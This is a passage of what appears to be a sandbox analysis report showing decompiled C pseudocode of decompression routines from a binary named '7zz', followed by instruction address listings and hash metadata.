																__eflags = _t198 -  *((intOrPtr*)(_t378 + 0x79c));
																if(_t198 >=  *((intOrPtr*)(_t378 + 0x79c))) {
																	_t310 = _t378 + 0x7a0;
																	__eflags = _t198 -  *((intOrPtr*)(_t378 + 0x7a0));
																	_t359 = 0xa;
																	if(_t198 >=  *((intOrPtr*)(_t378 + 0x7a0))) {
																		do {
																			_t401 =  *((intOrPtr*)(_t310 + 4));
																			_t310 = _t310 + 4;
																			_t359 = _t359 + 1;
																			__eflags = _t198 - _t401;
																		} while (_t198 >= _t401);
																	}
																} else {
																	_t359 = 0;
																}
																 *_t380 = _t263 + _t359;
																 *(_t380 + 0x30) =  *(_t380 + 0x30) >> _t359;
																_t267 =  *(_t378 + 0x7b8 + _t359 * 4);
																_t201 = (_t198 -  *((intOrPtr*)(_t378 + 0x774 + _t359 * 4)) >> 0xf - _t359) + _t267;
																__eflags = _t201 - 0x20;
																if(_t201 < 0x20) {
																	_t268 =  *(_t378 + 0x7f8 + _t201 * 4);
																} else {
																	_t268 = _t267 | 0xffffffff;
																}
																 *(_t402 + 0x20) = _t268;
																__eflags = _t268 -  *((intOrPtr*)(_t378 + 0xd4c));
																if(_t268 >=  *((intOrPtr*)(_t378 + 0xd4c))) {
																	goto L80;
																} else {
																	__eflags =  *_t380 - 8;
																	if( *_t380 >= 8) {
																		do {
																			 *(_t402 + 0x1c) = 0;
																			_t211 = L0044AD80(_t380 + 8, _t402 + 0x18);
																			__eflags = _t211;
																			if(_t211 == 0) {
																				 *(_t402 + 0x18) = 0xff;
																				_t218 =  *(_t380 + 0x28) + 1;
																				__eflags = _t218;
																				 *(_t380 + 0x28) = _t218;
																			}
																			_t367 =  *_t380;
																			 *(_t380 + 0x30) =  *(_t380 + 0x30) | ( *(_t402 + 0x18) & 0x000000ff) << 0x00000020 - _t367;
																			_t216 = _t367 - 8;
																			__eflags = _t216 - 8;
																			 *(_t380 + 4) =  *(_t380 + 4) << 8;
																			 *_t380 = _t216;
																		} while (_t216 >= 8);
																		_t268 =  *(_t402 + 0x20);
																	}
																	_t362 =  *(_t380 + 0x30);
																	 *_t380 =  *_t380;
																	_push( *(_t402 + 0x1c));
																	 *(_t380 + 0x30) = _t362 >> 0;
																	_t388 =  *((intOrPtr*)(0x47c000 + _t268 * 4)) + (0xbadbac & _t362);
																	_push(_t388);
																	_t208 = L0044ADB0(_t378 + 0x18);
																	__eflags = _t208;
																	if(_t208 == 0) {
																		goto L80;
																	} else {
																		_t209 =  *(_t402 + 0x1c);
																		_t321 =  *(_t402 + 0x10) - _t209;
																		__eflags = _t321;
																		 *(_t402 + 0x28) =  *(_t402 + 0x28) - _t209;
																		 *(_t402 + 0x10) = _t321;
																		if(_t321 != 0) {
																			_t395 =  *(_t402 + 0x28);
																			 *(_t378 + 0xd54) =  *(_t402 + 0x10);
																			 *((intOrPtr*)(_t378 + 0xd58)) = _t388;
																			goto L77;
																		} else {
																			goto L73;
																		}
																	}
																}
															}
														}
													} else {
														_t342 = _t378 + 0x18;
														 *( *((intOrPtr*)(_t378 + 0x18)) +  *((intOrPtr*)(_t378 + 0x1c))) = _t186;
														_t391 =  *((intOrPtr*)(_t342 + 4)) + 1;
														 *((intOrPtr*)(_t342 + 4)) = _t391;
														__eflags = _t391 -  *((intOrPtr*)(_t342 + 8));
														if(__eflags == 0) {
															L0040EFBD(_t342, __eflags);
														}
														 *(_t402 + 0x28) = _t395 - 1;
														L73:
														_t395 =  *(_t402 + 0x28);
														__eflags = _t395;
														if(_t395 <= 0) {
															goto L82;
														} else {
															continue;
														}
													}
												}
												goto L83;
											}
											goto L80;
										} else {
											_t230 =  *(_t378 + 0xd44);
											__eflags = _t230;
											if(__eflags > 0) {
												while(1) {
													__eflags = _t395;
													if(_t395 <= 0) {
														break;
													}
													_t285 =  *((intOrPtr*)(_t378 + 0x40));
													__eflags = _t285 - 0x20;
													if(_t285 != 0x20) {
														_t232 =  *(_t378 + 0x70);
														 *((intOrPtr*)(_t378 + 0x40)) = _t285 + 8;
														_t288 =  *(_t378 + 0x70) >> 8;
														__eflags = _t288;
														 *(_t378 + 0x70) = _t288;
													} else {
														_t386 = _t378 + 0x48;
														__eflags =  *((intOrPtr*)(_t378 + 0x48)) -  *((intOrPtr*)(_t378 + 0x4c));
														if( *((intOrPtr*)(_t378 + 0x48)) <  *((intOrPtr*)(_t378 + 0x4c))) {
															L29:
															_t292 =  *_t386;
															_t232 =  *_t292;
															 *_t386 = _t292 + 1;
														} else {
															_t236 = E0040E007(_t386, _t378);
															__eflags = _t236;
															if(_t236 == 0) {
																_t232 = _t236 | 0x000000ff;
																 *(_t378 + 0x68) =  *(_t378 + 0x68) + 1;
															} else {
																goto L29;
															}
														}
													}
													_t289 = _t378 + 0x18;
													 *( *((intOrPtr*)(_t378 + 0x18)) +  *((intOrPtr*)(_t378 + 0x1c))) = _t232;
													_t383 =  *((intOrPtr*)(_t289 + 4)) + 1;
													 *((intOrPtr*)(_t289 + 4)) = _t383;
													__eflags = _t383 -  *((intOrPtr*)(_t289 + 8));
													if(__eflags == 0) {
														L0040EFBD(_t289, __eflags);
													}
													_t385 =  *(_t378 + 0xd44) - 1;
													_t395 = _t395 - 1;
													 *(_t378 + 0xd44) = _t385;
													__eflags = _t385;
													if(_t385 > 0) {
														continue;
													}
													break;
												}
												_t230 =  *(_t378 + 0xd44);
												 *(_t402 + 0x28) = _t395;
												__eflags = _t230;
											}
											 *(_t378 + 0xd5c) = _t230 & 0xffffff00 | __eflags == 0x00000000;
											L77:
											__eflags = _t395;
											if(_t395 <= 0) {
												goto L82;
											} else {
												continue;
											}
										}
										goto L83;
									}
								}
							} else {
								while(1) {
									__eflags = _t395 - _t379;
									if(_t395 <= _t379) {
										break;
									}
									_t345 = _t378 + 0x18;
									 *(_t378 + 0xd54) = _t174 - 1;
									_t375 =  *((intOrPtr*)(_t345 + 0x10));
									_t244 =  *((intOrPtr*)(_t345 + 4)) -  *((intOrPtr*)(_t378 + 0xd58)) - 1;
									__eflags = _t244 - _t375;
									if(_t244 >= _t375) {
										_t244 = _t244 + _t375;
										__eflags = _t244;
									}
									 *((char*)( *_t345 +  *((intOrPtr*)(_t345 + 4)))) =  *((intOrPtr*)( *_t345 + _t244));
									_t394 =  *((intOrPtr*)(_t345 + 4)) + 1;
									 *((intOrPtr*)(_t345 + 4)) = _t394;
									__eflags = _t394 -  *((intOrPtr*)(_t345 + 8));
									if(__eflags == 0) {
										L0040EFBD(_t345, __eflags);
									}
									_t174 =  *(_t378 + 0xd54);
									_t379 = 0;
									_t395 = _t395 - 1;
									__eflags = _t174;
									if(_t174 > 0) {
										continue;
									} else {
										 *(_t402 + 0x28) = _t395;
										goto L18;
									}
									goto L83;
								}
								 *(_t402 + 0x28) = _t395;
								goto L82;
							}
						}
					} else {
						if( *((intOrPtr*)(__ecx + 0xd52)) != 0) {
							L5:
							_t274 =  *((intOrPtr*)(_t378 + 0xd53));
							_t249 = E0040DF95(_t378 + 0x48, 0x20000);
							__eflags = _t249;
							if(_t249 == 0) {
								goto L4;
							} else {
								__eflags = _t274;
								if(_t274 != 0) {
									E0040DFF3(_t378 + 0x48);
									 *((intOrPtr*)(_t378 + 0x40)) = 0x20;
									 *(_t378 + 0x44) = _t379;
									 *(_t378 + 0x68) = _t379;
									 *(_t378 + 0x70) = _t379;
									 *((char*)(_t378 + 0xd53)) = 0;
								}
								E00450690( *((intOrPtr*)(_t378 + 0xd52)));
								 *(_t378 + 0xd48) = 0;
								 *(_t378 + 0xd54) = _t379;
								 *(_t378 + 0xd5c) = 1;
								goto L9;
							}
						} else {
							asm("sbb eax, eax");
							if(L0040EE76(__ecx + 0x18, ( ~( *(__ecx + 0xd51)) & 0x00008000) + 0x8000) != 0) {
								goto L5;
							} else {
								L4:
								return 0x8007000e;
							}
						}
					}
				}
				L83:
			}































































                                                                                                                                    0x0044a7e7
                                                                                                                                    0x0044a7e9
                                                                                                                                    0x0044a7f2
                                                                                                                                    0x0044ad6d
                                                                                                                                    0x0044ad6d
                                                                                                                                    0x0044ad73
                                                                                                                                    0x0044a7f8
                                                                                                                                    0x0044a7f8
                                                                                                                                    0x0044a7fd
                                                                                                                                    0x0044a89a
                                                                                                                                    0x0044a89a
                                                                                                                                    0x0044a89e
                                                                                                                                    0x0044a8a0
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a8a6
                                                                                                                                    0x0044a8a6
                                                                                                                                    0x0044a8ac
                                                                                                                                    0x0044a8ae
                                                                                                                                    0x0044a90a
                                                                                                                                    0x0044a90a
                                                                                                                                    0x0044a90c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a912
                                                                                                                                    0x0044a918
                                                                                                                                    0x0044a91a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a922
                                                                                                                                    0x0044a924
                                                                                                                                    0x0044ad41
                                                                                                                                    0x0044ad4e
                                                                                                                                    0x0044ad54
                                                                                                                                    0x0044a92a
                                                                                                                                    0x0044a92c
                                                                                                                                    0x0044a931
                                                                                                                                    0x0044a933
                                                                                                                                    0x0044ad5a
                                                                                                                                    0x0044ad63
                                                                                                                                    0x0044a939
                                                                                                                                    0x0044a939
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a939
                                                                                                                                    0x0044a933
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a940
                                                                                                                                    0x0044a946
                                                                                                                                    0x0044a948
                                                                                                                                    0x0044a9f5
                                                                                                                                    0x0044a9f5
                                                                                                                                    0x0044a9f9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a9ff
                                                                                                                                    0x0044aa04
                                                                                                                                    0x0044aa09
                                                                                                                                    0x0044aa20
                                                                                                                                    0x0044aa25
                                                                                                                                    0x0044aa27
                                                                                                                                    0x0044aa39
                                                                                                                                    0x0044aa3f
                                                                                                                                    0x0044aa45
                                                                                                                                    0x0044aa4a
                                                                                                                                    0x0044aa4c
                                                                                                                                    0x0044aa4c
                                                                                                                                    0x0044aa4f
                                                                                                                                    0x0044aa50
                                                                                                                                    0x0044aa50
                                                                                                                                    0x0044aa4c
                                                                                                                                    0x0044aa29
                                                                                                                                    0x0044aa30
                                                                                                                                    0x0044aa30
                                                                                                                                    0x0044aa58
                                                                                                                                    0x0044aa5f
                                                                                                                                    0x0044aa78
                                                                                                                                    0x0044aa7a
                                                                                                                                    0x0044aa7f
                                                                                                                                    0x00000000
                                                                                                                                    0x0044aa85
                                                                                                                                    0x0044aa85
                                                                                                                                    0x0044aa8c
                                                                                                                                    0x0044aa91
                                                                                                                                    0x0044aabe
                                                                                                                                    0x0044ad1b
                                                                                                                                    0x00000000
                                                                                                                                    0x0044aac4
                                                                                                                                    0x0044aac4
                                                                                                                                    0x0044aac9
                                                                                                                                    0x00000000
                                                                                                                                    0x0044aacf
                                                                                                                                    0x0044aad5
                                                                                                                                    0x0044aada
                                                                                                                                    0x0044aadc
                                                                                                                                    0x0044aaf6
                                                                                                                                    0x0044aafe
                                                                                                                                    0x0044ab04
                                                                                                                                    0x0044aade
                                                                                                                                    0x0044aae8
                                                                                                                                    0x0044aaee
                                                                                                                                    0x0044aaee
                                                                                                                                    0x0044ab0a
                                                                                                                                    0x0044ab0c
                                                                                                                                    0x0044ab0f
                                                                                                                                    0x0044ab11
                                                                                                                                    0x0044ab19
                                                                                                                                    0x0044ab1e
                                                                                                                                    0x0044ab23
                                                                                                                                    0x0044ab25
                                                                                                                                    0x0044ab2a
                                                                                                                                    0x0044ab2f
                                                                                                                                    0x0044ab2f
                                                                                                                                    0x0044ab30
                                                                                                                                    0x0044ab30
                                                                                                                                    0x0044ab37
                                                                                                                                    0x0044ab4e
                                                                                                                                    0x0044ab61
                                                                                                                                    0x0044ab64
                                                                                                                                    0x0044ab67
                                                                                                                                    0x0044ab6a
                                                                                                                                    0x0044ab6a
                                                                                                                                    0x0044ab11
                                                                                                                                    0x0044ab6e
                                                                                                                                    0x0044ab7e
                                                                                                                                    0x0044ab8b
                                                                                                                                    0x0044ab8b
                                                                                                                                    0x0044ab8f
                                                                                                                                    0x0044ab93
                                                                                                                                    0x0044ab95
                                                                                                                                    0x0044ab98
                                                                                                                                    0x0044ab9c
                                                                                                                                    0x0044aba0
                                                                                                                                    0x0044aba2
                                                                                                                                    0x0044aba2
                                                                                                                                    0x0044aba8
                                                                                                                                    0x0044abad
                                                                                                                                    0x0044abc4
                                                                                                                                    0x0044abc9
                                                                                                                                    0x0044abcb
                                                                                                                                    0x0044abe5
                                                                                                                                    0x0044abeb
                                                                                                                                    0x0044abed
                                                                                                                                    0x0044abf2
                                                                                                                                    0x0044abf4
                                                                                                                                    0x0044abf4
                                                                                                                                    0x0044abf7
                                                                                                                                    0x0044abfa
                                                                                                                                    0x0044abfb
                                                                                                                                    0x0044abfb
                                                                                                                                    0x0044abf4
                                                                                                                                    0x0044abcd
                                                                                                                                    0x0044abdb
                                                                                                                                    0x0044abdb
                                                                                                                                    0x0044ac03
                                                                                                                                    0x0044ac11
                                                                                                                                    0x0044ac1b
                                                                                                                                    0x0044ac26
                                                                                                                                    0x0044ac28
                                                                                                                                    0x0044ac2b
                                                                                                                                    0x0044ac32
                                                                                                                                    0x0044ac2d
                                                                                                                                    0x0044ac2d
                                                                                                                                    0x0044ac2d
                                                                                                                                    0x0044ac3f
                                                                                                                                    0x0044ac43
                                                                                                                                    0x0044ac45
                                                                                                                                    0x00000000
                                                                                                                                    0x0044ac4b
                                                                                                                                    0x0044ac55
                                                                                                                                    0x0044ac5a
                                                                                                                                    0x0044ac5c
                                                                                                                                    0x0044ac64
                                                                                                                                    0x0044ac69
                                                                                                                                    0x0044ac6e
                                                                                                                                    0x0044ac70
                                                                                                                                    0x0044ac75
                                                                                                                                    0x0044ac7a
                                                                                                                                    0x0044ac7a
                                                                                                                                    0x0044ac7b
                                                                                                                                    0x0044ac7b
                                                                                                                                    0x0044ac82
                                                                                                                                    0x0044ac99
                                                                                                                                    0x0044acac
                                                                                                                                    0x0044acaf
                                                                                                                                    0x0044acb2
                                                                                                                                    0x0044acb5
                                                                                                                                    0x0044acb5
                                                                                                                                    0x0044acb9
                                                                                                                                    0x0044acb9
                                                                                                                                    0x0044acbd
                                                                                                                                    0x0044accd
                                                                                                                                    0x0044acda
                                                                                                                                    0x0044acde
                                                                                                                                    0x0044ace8
                                                                                                                                    0x0044acea
                                                                                                                                    0x0044aceb
                                                                                                                                    0x0044acf0
                                                                                                                                    0x0044acf2
                                                                                                                                    0x00000000
                                                                                                                                    0x0044acf4
                                                                                                                                    0x0044acf4
                                                                                                                                    0x0044ad02
                                                                                                                                    0x0044ad02
                                                                                                                                    0x0044ad04
                                                                                                                                    0x0044ad08
                                                                                                                                    0x0044ad0c
                                                                                                                                    0x0044ad28
                                                                                                                                    0x0044ad2c
                                                                                                                                    0x0044ad32
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044ad0c
                                                                                                                                    0x0044acf2
                                                                                                                                    0x0044ac45
                                                                                                                                    0x0044aac9
                                                                                                                                    0x0044aa93
                                                                                                                                    0x0044aa99
                                                                                                                                    0x0044aa9c
                                                                                                                                    0x0044aaa5
                                                                                                                                    0x0044aaa8
                                                                                                                                    0x0044aaab
                                                                                                                                    0x0044aaad
                                                                                                                                    0x0044aaaf
                                                                                                                                    0x0044aaaf
                                                                                                                                    0x0044aab5
                                                                                                                                    0x0044ad0e
                                                                                                                                    0x0044ad0e
                                                                                                                                    0x0044ad12
                                                                                                                                    0x0044ad14
                                                                                                                                    0x00000000
                                                                                                                                    0x0044ad16
                                                                                                                                    0x00000000
                                                                                                                                    0x0044ad16
                                                                                                                                    0x0044ad14
                                                                                                                                    0x0044aa91
                                                                                                                                    0x00000000
                                                                                                                                    0x0044aa7f
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a94e
                                                                                                                                    0x0044a94e
                                                                                                                                    0x0044a954
                                                                                                                                    0x0044a956
                                                                                                                                    0x0044a95c
                                                                                                                                    0x0044a95c
                                                                                                                                    0x0044a95e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a960
                                                                                                                                    0x0044a963
                                                                                                                                    0x0044a966
                                                                                                                                    0x0044a994
                                                                                                                                    0x0044a99a
                                                                                                                                    0x0044a9a0
                                                                                                                                    0x0044a9a0
                                                                                                                                    0x0044a9a3
                                                                                                                                    0x0044a968
                                                                                                                                    0x0044a96e
                                                                                                                                    0x0044a971
                                                                                                                                    0x0044a973
                                                                                                                                    0x0044a980
                                                                                                                                    0x0044a980
                                                                                                                                    0x0044a982
                                                                                                                                    0x0044a985
                                                                                                                                    0x0044a975
                                                                                                                                    0x0044a977
                                                                                                                                    0x0044a97c
                                                                                                                                    0x0044a97e
                                                                                                                                    0x0044a98c
                                                                                                                                    0x0044a98f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a97e
                                                                                                                                    0x0044a973
                                                                                                                                    0x0044a9ac
                                                                                                                                    0x0044a9af
                                                                                                                                    0x0044a9b8
                                                                                                                                    0x0044a9bb
                                                                                                                                    0x0044a9be
                                                                                                                                    0x0044a9c0
                                                                                                                                    0x0044a9c2
                                                                                                                                    0x0044a9c2
                                                                                                                                    0x0044a9cd
                                                                                                                                    0x0044a9ce
                                                                                                                                    0x0044a9d1
                                                                                                                                    0x0044a9d7
                                                                                                                                    0x0044a9d9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a9d9
                                                                                                                                    0x0044a9db
                                                                                                                                    0x0044a9e1
                                                                                                                                    0x0044a9e5
                                                                                                                                    0x0044a9e5
                                                                                                                                    0x0044a9ea
                                                                                                                                    0x0044ad38
                                                                                                                                    0x0044ad38
                                                                                                                                    0x0044ad3a
                                                                                                                                    0x00000000
                                                                                                                                    0x0044ad3c
                                                                                                                                    0x00000000
                                                                                                                                    0x0044ad3c
                                                                                                                                    0x0044ad3a
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a948
                                                                                                                                    0x0044a912
                                                                                                                                    0x0044a8b0
                                                                                                                                    0x0044a8b0
                                                                                                                                    0x0044a8b0
                                                                                                                                    0x0044a8b2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a8bf
                                                                                                                                    0x0044a8c2
                                                                                                                                    0x0044a8cd
                                                                                                                                    0x0044a8d0
                                                                                                                                    0x0044a8d1
                                                                                                                                    0x0044a8d3
                                                                                                                                    0x0044a8d5
                                                                                                                                    0x0044a8d5
                                                                                                                                    0x0044a8d5
                                                                                                                                    0x0044a8e1
                                                                                                                                    0x0044a8ea
                                                                                                                                    0x0044a8ed
                                                                                                                                    0x0044a8f0
                                                                                                                                    0x0044a8f2
                                                                                                                                    0x0044a8f4
                                                                                                                                    0x0044a8f4
                                                                                                                                    0x0044a8f9
                                                                                                                                    0x0044a8ff
                                                                                                                                    0x0044a901
                                                                                                                                    0x0044a902
                                                                                                                                    0x0044a904
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a906
                                                                                                                                    0x0044a906
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a906
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a904
                                                                                                                                    0x0044ad66
                                                                                                                                    0x00000000
                                                                                                                                    0x0044ad66
                                                                                                                                    0x0044a8ae
                                                                                                                                    0x0044a803
                                                                                                                                    0x0044a80b
                                                                                                                                    0x0044a83d
                                                                                                                                    0x0044a83d
                                                                                                                                    0x0044a84b
                                                                                                                                    0x0044a850
                                                                                                                                    0x0044a852
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a854
                                                                                                                                    0x0044a854
                                                                                                                                    0x0044a856
                                                                                                                                    0x0044a85b
                                                                                                                                    0x0044a860
                                                                                                                                    0x0044a867
                                                                                                                                    0x0044a86a
                                                                                                                                    0x0044a86d
                                                                                                                                    0x0044a870
                                                                                                                                    0x0044a870
                                                                                                                                    0x0044a881
                                                                                                                                    0x0044a886
                                                                                                                                    0x0044a88d
                                                                                                                                    0x0044a893
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a893
                                                                                                                                    0x0044a80d
                                                                                                                                    0x0044a818
                                                                                                                                    0x0044a82c
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a831
                                                                                                                                    0x0044a831
                                                                                                                                    0x0044a83a
                                                                                                                                    0x0044a83a
                                                                                                                                    0x0044a82c
                                                                                                                                    0x0044a80b
                                                                                                                                    0x0044a7fd
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: beb4acdf8bf1421510833bd6b1ce7ab3a7039bd55d3ca3d2172d8faff35e7650
                                                                                                                                    • Instruction ID: 184203cb68d9c273adb077903bfb3a348430252a785c529ac687c963470ba2b4
                                                                                                                                    • Opcode Fuzzy Hash: beb4acdf8bf1421510833bd6b1ce7ab3a7039bd55d3ca3d2172d8faff35e7650
                                                                                                                                    • Instruction Fuzzy Hash: E902E371604A428BD718CF28C49066AFBE2FF95304F14462ED49A87741D739F8A6CBDA
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0044E430 Relevance: .4, Instructions: 418COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E0044E430(signed int __ecx, void* __eflags) {
				intOrPtr _t140;
				signed int _t141;
				signed int _t142;
				signed int _t148;
				signed int _t150;
				signed int _t151;
				signed int _t153;
				signed int _t156;
				unsigned int _t159;
				signed int _t160;
				signed int _t175;
				intOrPtr _t180;
				signed int _t182;
				signed int _t183;
				unsigned int _t185;
				signed int _t187;
				void* _t191;
				signed int _t193;
				signed int _t198;
				signed int _t200;
				intOrPtr _t202;
				char* _t203;
				signed int _t207;
				signed int _t209;
				intOrPtr _t214;
				signed int _t216;
				signed int _t221;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t252;
				signed int _t285;
				signed int _t289;
				signed int _t292;
				intOrPtr _t295;
				intOrPtr _t309;
				signed int _t313;
				intOrPtr _t315;
				signed int _t316;
				intOrPtr _t321;
				signed int _t324;
				intOrPtr _t326;
				intOrPtr* _t329;
				intOrPtr* _t333;
				signed int _t337;
				signed int _t342;
				signed int _t349;
				intOrPtr* _t350;
				intOrPtr _t355;
				void* _t356;

				_push(0xffffffff);
				_push(E00479808);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t355;
				_t356 = _t355 - 0x24;
				_t337 = __ecx;
				_t332 = __ecx + 0x40;
				 *(_t356 + 0x14) = __ecx;
				if(E0040DF95(__ecx + 0x40, 0x100000) != 0) {
					_t140 =  *0x4914f0; // 0x2000
					_t329 = __ecx + 0x10;
					_t141 = L0040EE76(_t329, _t140);
					__eflags = _t141;
					if(_t141 != 0) {
						_t142 =  *(_t356 + 0x50);
						__eflags = _t142;
						if(_t142 != 0) {
							 *((intOrPtr*)(_t356 + 0x24)) =  *_t142;
							 *((intOrPtr*)(_t356 + 0x20)) = 0;
							 *((intOrPtr*)(_t356 + 0x24)) = 0;
							 *((intOrPtr*)(_t356 + 0x2c)) =  *((intOrPtr*)(_t142 + 4));
							L0040EEC1(_t329,  *(_t356 + 0x48));
							E00450690(0);
							E0040DFE4(_t332,  *(_t356 + 0x44));
							_t333 = __ecx + 0x38;
							E0040DFF3(_t333 + 8);
							 *_t333 = 0x20;
							 *(_t333 + 4) = 0;
							 *(_t333 + 0x28) = 0;
							 *(_t333 + 0x30) = 0;
							 *((intOrPtr*)(_t356 + 0x18)) = __ecx;
							 *((intOrPtr*)(_t356 + 0x3c)) = 0;
							_t148 = E0044E3B0(__ecx);
							__eflags = _t148;
							if(_t148 != 0) {
								_t309 =  *((intOrPtr*)(_t356 + 0x20));
								__eflags = _t309 -  *((intOrPtr*)(_t356 + 0x28));
								_t150 =  *(_t356 + 0x1c);
								if(__eflags > 0) {
									L64:
									__eflags =  *((intOrPtr*)(_t356 + 0x20)) -  *((intOrPtr*)(_t356 + 0x28));
									if(__eflags < 0) {
										L70:
										_t151 = L0040EFA1(_t329);
										 *((intOrPtr*)(_t356 + 0x3c)) = 0xffffffff;
										E0044E120(_t337);
										_t153 = _t151;
									} else {
										if(__eflags > 0) {
											goto L67;
										} else {
											__eflags = _t150 -  *((intOrPtr*)(_t356 + 0x24));
											if(_t150 <=  *((intOrPtr*)(_t356 + 0x24))) {
												goto L70;
											} else {
												goto L67;
											}
										}
									}
								} else {
									if(__eflags < 0) {
										L11:
										_t221 =  *(_t356 + 0x54);
										__eflags = _t221;
										if(_t221 == 0) {
											L15:
											L0041F43D(_t333);
											_t156 =  *(_t333 + 0x30);
											__eflags = _t156 & 0x00000001;
											 *_t333 =  *_t333 + 1;
											 *(_t333 + 0x30) = _t156 >> 1;
											if((_t156 & 0x00000001) != 0) {
												__eflags =  *(_t337 + 0x239);
												if( *(_t337 + 0x239) == 0) {
													__eflags =  *_t333 - 8;
													if( *_t333 >= 8) {
														do {
															 *((char*)(_t356 + 0x18)) = 0;
															_t175 = L0044AD80(_t333 + 8, _t356 + 0x14);
															__eflags = _t175;
															if(_t175 == 0) {
																 *(_t356 + 0x14) = 0xff;
																_t182 =  *(_t333 + 0x28) + 1;
																__eflags = _t182;
																 *(_t333 + 0x28) = _t182;
															}
															_t315 =  *_t333;
															 *(_t333 + 0x30) =  *(_t333 + 0x30) | ( *(_t356 + 0x14) & 0x000000ff) << 0x00000020 - _t315;
															_t180 = _t315 - 8;
															__eflags = _t180 - 8;
															 *(_t333 + 4) =  *(_t333 + 4) << 8;
															 *_t333 = _t180;
														} while (_t180 >= 8);
													}
													_t159 =  *(_t333 + 0x30);
													_t252 = _t159 & 0x000000ff;
													 *_t333 =  *_t333 + 8;
													_t160 = _t159 >> 8;
													__eflags = _t160;
													 *(_t333 + 0x30) = _t160;
													goto L58;
												} else {
													_push(_t333);
													_t183 = L0044EBB0(_t337 + 0x70);
													__eflags = _t183 - 0x100;
													if(_t183 >= 0x100) {
														L67:
														 *((intOrPtr*)(_t356 + 0x3c)) = 0xffffffff;
														E0044E120(_t337);
														_t153 = 1;
													} else {
														_t252 = _t183;
														L58:
														 *( *(_t329 + 4) +  *_t329) = _t252;
														_t313 =  *(_t329 + 4) + 1;
														 *(_t329 + 4) = _t313;
														__eflags = _t313 -  *((intOrPtr*)(_t329 + 8));
														if(__eflags == 0) {
															L0040EFBD(_t329, __eflags);
														}
														_t150 =  *(_t356 + 0x1c) + 1;
														__eflags = _t150;
														asm("adc ecx, 0x0");
														 *(_t356 + 0x1c) = _t150;
														goto L61;
													}
												}
											} else {
												_t228 =  *(_t337 + 0x23c);
												L0041F43D(_t333);
												_t185 =  *(_t333 + 0x30);
												_push(_t333);
												 *_t333 =  *_t333 + _t228;
												_t229 =  *(_t356 + 0x14);
												_t342 = (0x00000001 << _t228) - 0x00000001 & _t185;
												_t41 = _t229 + 0x1a0; // 0x1001a0
												 *(_t333 + 0x30) = _t185 >> _t228;
												_t187 = L0044EBB0(_t41);
												__eflags = _t187 - 0x40;
												if(_t187 >= 0x40) {
													L69:
													 *((intOrPtr*)(_t356 + 0x3c)) = 0xffffffff;
													E0044E120(_t229);
													_t153 = 1;
												} else {
													_push(_t333);
													_t44 = _t229 + 0x108; // 0x100108
													 *(_t356 + 0x54) = (_t187 <<  *(_t229 + 0x23c)) + _t342;
													_t191 = L0044EBB0(_t44);
													__eflags = _t191 - 0x40;
													if(_t191 >= 0x40) {
														goto L69;
													} else {
														_t231 =  *((intOrPtr*)(_t229 + 0x240)) + _t191;
														__eflags = _t191 - 0x3f;
														if(_t191 == 0x3f) {
															__eflags =  *_t333 - 8;
															if( *_t333 >= 8) {
																do {
																	 *(_t356 + 0x48) = 0;
																	_t209 = L0044AD80(_t333 + 8, _t356 + 0x44);
																	__eflags = _t209;
																	if(_t209 == 0) {
																		 *(_t356 + 0x44) = 0xff;
																		_t216 =  *(_t333 + 0x28) + 1;
																		__eflags = _t216;
																		 *(_t333 + 0x28) = _t216;
																	}
																	_t326 =  *_t333;
																	 *(_t333 + 0x30) =  *(_t333 + 0x30) | ( *(_t356 + 0x44) & 0x000000ff) << 0x00000020 - _t326;
																	_t214 = _t326 - 8;
